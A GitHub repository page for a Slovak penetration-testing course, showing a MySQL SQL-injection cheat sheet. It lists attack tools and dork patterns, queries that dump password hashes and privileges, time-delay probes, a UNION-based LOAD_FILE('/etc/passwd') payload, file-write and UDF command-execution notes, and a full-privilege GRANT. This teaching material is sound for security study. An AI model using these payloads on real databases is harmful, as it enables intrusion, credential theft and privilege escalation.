https://github.com/miroslav-reiter/penetration_testing_sql
🐱💻 Penetration Testing SQL - Materiály, zdrojové kódy, testovacie sady a prípady, zdroje a návody ku kurzom: Penetračné Testovanie, Testovanie softvéru a SQL kurzy
https://github.com/miroslav-reiter/penetration_testing_sql
cracking hack mysql penetration-test penetration-testing penetration-testing-tools reiter sql testing testing-practices testing-tools
Last synced: 19 days ago
JSON representation
🐱💻 Penetration Testing SQL - Materiály, zdrojové kódy, testovacie sady a prípady, zdroje a návody ku kurzom: Penetračné Testovanie, Testovanie softvéru a SQL kurzy
- Host: GitHub
- URL: https://github.com/miroslav-reiter/penetration_testing_sql
- Owner: miroslav-reiter
- Created: 2021-12-17T21:11:12.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2022-05-04T18:55:53.000Z (about 4 years ago)
- Last Synced: 2025-10-09T18:36:57.220Z (9 months ago)
- Topics: cracking, hack, mysql, penetration-test, penetration-testing, penetration-testing-tools, reiter, sql, testing, testing-practices, testing-tools
- Homepage: https://www.vita.sk/online-kurz-penetracne-testovanie-i-zaciatocnik/
- Size: 33.2 KB
- Stars: 4
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# 🐱💻 Penetration Testing SQL
Materiály, zdrojové kódy, testovacie sady a prípady, zdroje a návody ku kurzu Penetračné Testovanie, Testovanie softvéru a SQL kurzy
## 🧰 GUI nástroje
```sql
-- GUI nástroje
Havij
TyrantSQL -- Treba Python 2.*.* + knižnice
SQL Power Injector
Vega
```
## 🔨 CMD nástroje
```sql
-- CMD nástroje
SQLmap
Hashcat
```
## 🕵️♂️ Vyhľadávacie dopyty Google/Bing
```sql
-- Vyhľadávacie dopyty Google/Bing
PHP + MySQL
php?id=
asp?id=
jsp?id=
-- SQLzoo hack
?answer=1
```
## 💡 SQL skripty
### 🔎 Verzia DB
```sql
-- Verzia DB (Version DB)
SELECT @@version
```
### 📜 Komentáre (Comments)
```sql
-- Komentáre (Comments)
SELECT 1; # comment
SELECT /* comment */ 1;
SELECT 1; -- comment
```
### 👤 Aktuálny používateľ (Current User)
```sql
-- Aktuálny používateľ (Current User)
SELECT user();
SELECT system_user();
```
### 🧑🤝🧑 Zoznam používateľov (List Users)
```sql
-- Zoznam používateľov (List Users)
SELECT user FROM mysql.user; -- priv
```
### #️⃣ Zoznam hashov hesiel (List Password Hashes)
```sql
-- Zoznam hashov hesiel (List Password Hashes)
SELECT host, user, password FROM mysql.user; -- priv
```
### 🔑 Nástroje na lámanie hesiel (Password crackers)
```sql
-- Nástroje na lámanie hesiel (Password crackers)
-- Password Cracker
-- HashCat, John the Ripper will crack MySQL password hashes
```
### 📜 Zoznam oprávnení/privilégií (List Privileges)
```sql
-- Zoznam oprávnení/privilégií (List Privileges)
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
```
### 🔒 Zoznam oprávnení/privilégií na databáze (List privs on databases (schemas))
```sql
-- Zoznam oprávnení/privilégií na databáze (List privs on databases (schemas))
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
```
### 🔐 Zoznam DBA admin účtov List (DBA Accounts)
```sql
-- Zoznam DBA admin účtov List (DBA Accounts)
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
```
### ✅ Názov aktuálne používanej/pripojenej databázy (Current Database)
```sql
-- Názov aktuálne používanej/pripojenej databázy (Current Database)
SELECT database()
```
### 📚 Zoznam databáz (List Databases)
```sql
-- Zoznam databáz (List Databases)
SHOW databases;
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv
```
### 🧮 Výpis stĺpcov tabuliek (List Columns)
```sql
-- List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
```
### 📋 Zoznam tabuliek (List Tables)
```sql
-- Zoznam tabuliek (List Tables)
SHOW tables;
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
```
### 📈 Nájdenie tabulky podľa názvu stĺpca (Find Tables From Column Name)
```sql
-- Nájdenie tabulky podľa názvu stĺpca (Find Tables From Column Name)
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'
```
### 🔦 Výber ntého riadku (Select Nth Row)
```sql
-- Výber ntého riadku (Select Nth Row)
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
```
### 🧲 Výber ntého znaku (Select Nth Char)
```sql
-- Výber ntého znaku (Select Nth Char)
SELECT substr('abcd', 3, 1); # returns c
```
### 💥 Bitový AND (Bitwise AND)
```sql
-- Bitový AND (Bitwise AND)
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
```
### 🔠 ASCII hodnota (ASCII Value -> Char)
```sql
-- ASCII hodnota (ASCII Value -> Char)
SELECT char(65); # returns A
-- Char -> ASCII Value
SELECT ascii('A'); # returns 65
```
### 💯 Pretypovanie (Casting)
```sql
-- Pretypovanie (Casting)
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
```
### 💭 Spájanie reťazcov, zreťazenie (String Concatenation/join)
```sql
-- Spájanie reťazcov, zreťazenie (String Concatenation/join)
SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC
```
### 🧭 Riadiaca štruktúra/príkaz IF (IF Statement)
```sql
-- Riadiaca štruktúra/príkaz IF (IF Statement)
SELECT if(1=1,'foo','bar'); -- returns 'foo’
```
### Riadiaca štruktúra/príkaz CASE (CASE Statement)
```sql
-- Riadiaca štruktúra/príkaz CASE (CASE Statement)
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
```
### 🌶️ Vyhnutie sa uvodzovkám (Avoiding Quotes)
```sql
-- Vyhnutie sa uvodzovkám (Avoiding Quotes)
SELECT 0×414243; # returns ABC
```
### ⏲️ Oneskorenie (Time Delay)
```sql
-- Oneskorenie (Time Delay)
SELECT BENCHMARK(1000000, MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
```
### 🧪 Vykonávanie príkazov (Command Execution)
```sql
-- Vykonávanie príkazov (Command Execution)
/* If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
*/
```
### 📁 Prístup k lokálnemu súboru (Local File Access)
```sql
-- Prístup k lokálnemu súboru (Local File Access)
…' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
```
### 💣 Hostname, IP adresa, číslo portu (najčastejšie 3306-3309)(Hostname, IP Address, port)
```sql
-- Hostname, IP adresa, číslo portu (najčastejšie 3306-3309)(Hostname, IP Address, port)
SELECT @@hostname;
SHOW VARIABLES WHERE Variable_name = 'port'
SELECT SUBSTRING_INDEX(USER(), '@', -1) AS ip, @@hostname as hostname, @@port as port, DATABASE() as current_database;
mysql> \s
mysql> status
```
### 🆒 Vytvorenie používateľa (Create Users)
```sql
-- Vytvorenie používateľa (Create Users)
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
```
### 🆘 Vymazanie používateľa (Delete Users)
```sql
-- Vymazanie používateľa (Delete Users)
DROP USER test1; -- priv
```
### 🔥 Sprav z používateľa admina (Make User DBA)
```sql
-- Sprav z používateľa admina (Make User DBA)
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
```
### 🔋 Umiestnenie databázových súborov (Location of DB files)
```sql
-- Umiestnenie databázových súborov (Location of DB files)
SELECT @@datadir;
```
### ⚡ Defaultná systémová databáza/schéma (Default/System Database)
```sql
-- Defaultná systémová databáza/schéma (Default/System Database)
information_schema -- (>= mysql 5.0)
mysql
```